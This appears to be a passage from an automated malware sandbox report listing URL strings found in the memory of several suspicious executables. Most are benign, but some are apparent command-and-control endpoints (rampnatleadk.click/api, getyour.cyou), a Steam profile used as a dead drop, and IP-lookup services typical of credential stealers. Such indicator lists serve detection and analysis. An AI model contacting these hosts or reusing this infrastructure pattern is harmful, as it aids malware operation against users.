Source: freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: random.exe, 00000000.00000003.1755523362.000000000554D000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2456204269.00000000053CC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2558172527.0000000005AB4000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2800851515.000000000562F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 0000001E.00000002.2806209674.0000000004F95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001E.00000002.2806209674.0000000004E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001E.00000002.2806209674.0000000004F95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: freebl3.dll.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 1cfdc82c16.exe, 0000000D.00000003.2492162711.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2419343125.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2478516959.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2497594514.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2524450063.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2420248488.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2534792606.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000002.2543644073.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2535589796.0000000000734000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186850902.000000006F8ED000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2180558881.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186175058.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: random.exe, 00000000.00000003.1755523362.000000000554D000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2456204269.00000000053CC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2558172527.0000000005AB4000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2800851515.000000000562F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: random.exe, 00000000.00000003.1755523362.000000000554D000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2456204269.00000000053CC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2558172527.0000000005AB4000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2800851515.000000000562F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000029.00000003.2711208308.00000245A5D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2710879614.00000245A5D20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2711555016.00000245A5D5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2710532724.00000245A5B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2712228102.00000245A5D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: random.exe, 00000000.00000003.1728515741.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728708622.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728374400.000000000555C000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421722559.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421961748.00000000053C9000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525177048.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2524920657.0000000005ACF000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525558121.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2727854894.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2725441759.000000000563B000.00000004.00000800.00020000.00000000.sdmp, tmpB7AB.tmp.14.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 0000001E.00000002.2806209674.0000000004E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: 275588fe9c.exe, 0000000E.00000003.2445420622.0000000004D70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: 275588fe9c.exe, 0000000E.00000003.2445420622.0000000004D70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: random.exe, 00000000.00000003.1768515282.0000000005512000.00000004.00000800.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2182955957.000000000BD03000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2564180458.0000000005A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2182955957.000000000BD03000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2642218318.0000000005A81000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2616608069.0000000005A81000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2611477709.0000000005A82000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2577162040.0000000005A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: random.exe, 00000000.00000003.1728515741.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728708622.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728374400.000000000555C000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421722559.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421961748.00000000053C9000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525177048.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2524920657.0000000005ACF000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525558121.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2727854894.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2725441759.000000000563B000.00000004.00000800.00020000.00000000.sdmp, tmpB7AB.tmp.14.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: random.exe, 00000000.00000003.1728515741.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728708622.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728374400.000000000555C000.00000004.00000800.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421722559.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421961748.00000000053C9000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525177048.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2524920657.0000000005ACF000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525558121.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2727854894.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2725441759.000000000563B000.00000004.00000800.00020000.00000000.sdmp, tmpB7AB.tmp.14.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: random.exe, 00000000.00000003.1728515741.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728708622.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728374400.000000000555C000.00000004.00000800.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421722559.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421961748.00000000053C9000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525177048.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2524920657.0000000005ACF000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525558121.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2727854894.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2725441759.000000000563B000.00000004.00000800.00020000.00000000.sdmp, tmpB7AB.tmp.14.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000029.00000003.2711208308.00000245A5D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2710879614.00000245A5D20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2711555016.00000245A5D5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2710532724.00000245A5B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2712228102.00000245A5D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: random.exe, 00000000.00000003.1768515282.0000000005512000.00000004.00000800.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2182955957.000000000BD03000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2564180458.0000000005A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2182955957.000000000BD03000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2642218318.0000000005A81000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2616608069.0000000005A81000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2611477709.0000000005A82000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2577162040.0000000005A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: 5f198671b1.exe, 0000000C.00000002.2454320259.0000000000FF5000.00000040.00000001.01000000.00000010.sdmp, 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: firefox.exe, 00000029.00000003.2711208308.00000245A5D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2710879614.00000245A5D20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2711555016.00000245A5D5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2710532724.00000245A5B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2712228102.00000245A5D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: random.exe, 00000000.00000003.1728515741.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728708622.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728374400.000000000555C000.00000004.00000800.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421722559.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421961748.00000000053C9000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525177048.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2524920657.0000000005ACF000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525558121.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2727854894.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2725441759.000000000563B000.00000004.00000800.00020000.00000000.sdmp, tmpB7AB.tmp.14.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: random.exe, 00000000.00000003.1728515741.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728708622.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728374400.000000000555C000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421722559.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421961748.00000000053C9000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525177048.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2524920657.0000000005ACF000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525558121.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2727854894.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2725441759.000000000563B000.00000004.00000800.00020000.00000000.sdmp, tmpB7AB.tmp.14.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: random.exe, 00000000.00000003.1728515741.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728708622.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728374400.000000000555C000.00000004.00000800.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421722559.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421961748.00000000053C9000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525177048.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2524920657.0000000005ACF000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525558121.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2727854894.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2725441759.000000000563B000.00000004.00000800.00020000.00000000.sdmp, tmpB7AB.tmp.14.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000029.00000003.2742211388.00000245A3B33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000029.00000003.2742211388.00000245A3B33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: 071b4af2c1.exe, 0000002C.00000003.2782068015.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyou
Source: 071b4af2c1.exe, 0000002C.00000003.2824389892.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyou#;/Dd
Source: 071b4af2c1.exe, 0000002C.00000003.2800072987.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 071b4af2c1.exe, 0000002C.00000003.2824389892.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 071b4af2c1.exe, 0000002C.00000003.2782068015.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyou.
Source: 071b4af2c1.exe, 0000002C.00000003.2824389892.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 071b4af2c1.exe, 0000002C.00000003.2782068015.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyou/
Source: 071b4af2c1.exe, 0000002C.00000003.2782068015.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyou/B
Source: 071b4af2c1.exe, 0000002C.00000003.2824389892.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 071b4af2c1.exe, 0000002C.00000003.2782068015.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyou/E
Source: 071b4af2c1.exe, 0000002C.00000003.2800072987.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 071b4af2c1.exe, 0000002C.00000003.2824389892.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 071b4af2c1.exe, 0000002C.00000003.2782068015.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyou/W
Source: 071b4af2c1.exe, 0000002C.00000003.2800072987.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 071b4af2c1.exe, 0000002C.00000003.2824389892.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyou3;?D?
Source: 071b4af2c1.exe, 0000002C.00000003.2800072987.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 071b4af2c1.exe, 0000002C.00000003.2824389892.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyouB
Source: powershell.exe, 0000001E.00000002.2806209674.0000000004F95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: firefox.exe, 00000029.00000003.2711208308.00000245A5D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2710879614.00000245A5D20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2711555016.00000245A5D5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2710532724.00000245A5B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2712228102.00000245A5D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: 5f198671b1.exe, 0000000C.00000002.2454320259.0000000000FF5000.00000040.00000001.01000000.00000010.sdmp, 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ip
Source: 5f198671b1.exe, 0000000C.00000002.2454320259.0000000000FF5000.00000040.00000001.01000000.00000010.sdmp, 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ipbefore
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2182955957.000000000BD03000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2564180458.0000000005A84000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2642218318.0000000005A81000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2616608069.0000000005A81000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2611477709.0000000005A82000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2577162040.0000000005A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: 275588fe9c.exe, 0000000E.00000003.2445420622.0000000004D70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: firefox.exe, 00000029.00000003.2742211388.00000245A3B33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000029.00000003.2742211388.00000245A3B33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000029.00000003.2742211388.00000245A3B33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: freebl3.dll.2.dr	String found in binary or memory: https://mozilla.org0/
Source: firefox.exe, 00000029.00000003.2742211388.00000245A3B33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000029.00000003.2742211388.00000245A3B33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: 1cfdc82c16.exe, 0000000D.00000003.2492162711.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2478516959.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2497594514.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2524450063.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2534792606.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000002.2543644073.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2535589796.0000000000734000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.c
Source: 1cfdc82c16.exe, 0000000D.00000003.2420248488.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2534792606.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000002.2543644073.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2535589796.0000000000734000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/
Source: 1cfdc82c16.exe, 0000000D.00000003.2534792606.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000002.2543644073.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2535589796.0000000000734000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/6r
Source: 1cfdc82c16.exe, 0000000D.00000002.2545196100.0000000000763000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2500664419.0000000000763000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2478350296.000000000075A000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2507772832.0000000000763000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2490928732.0000000000761000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2534506083.0000000000763000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/?
Source: 1cfdc82c16.exe, 0000000D.00000002.2545196100.0000000000763000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2534506083.0000000000763000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/W
Source: 1cfdc82c16.exe, 0000000D.00000003.2490928732.0000000000761000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2534506083.0000000000763000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2420248488.000000000071D000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2471541685.0000000005390000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2420248488.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2534792606.000000000071D000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000002.2543644073.000000000071D000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2534792606.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2420248488.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2523721387.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000002.2539303450.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2491110032.00000000006EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/api
Source: 1cfdc82c16.exe, 0000000D.00000003.2523721387.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/api;Q
Source: 1cfdc82c16.exe, 0000000D.00000003.2490928732.0000000000761000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click/apin
Source: 1cfdc82c16.exe, 0000000D.00000003.2436505217.0000000005386000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click:443/api
Source: 1cfdc82c16.exe, 0000000D.00000003.2524450063.0000000000709000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click:443/apiers
Source: 1cfdc82c16.exe, 0000000D.00000003.2490685084.000000000539C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rampnatleadk.click:443/apiveSat
Source: firefox.exe, 00000029.00000003.2712228102.00000245A5D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: 071b4af2c1.exe, 0000002C.00000003.2719984799.00000000047F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199820567237
Source: 071b4af2c1.exe, 0000002C.00000003.2719984799.00000000047F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199820567237hac22tlMozilla/5.0
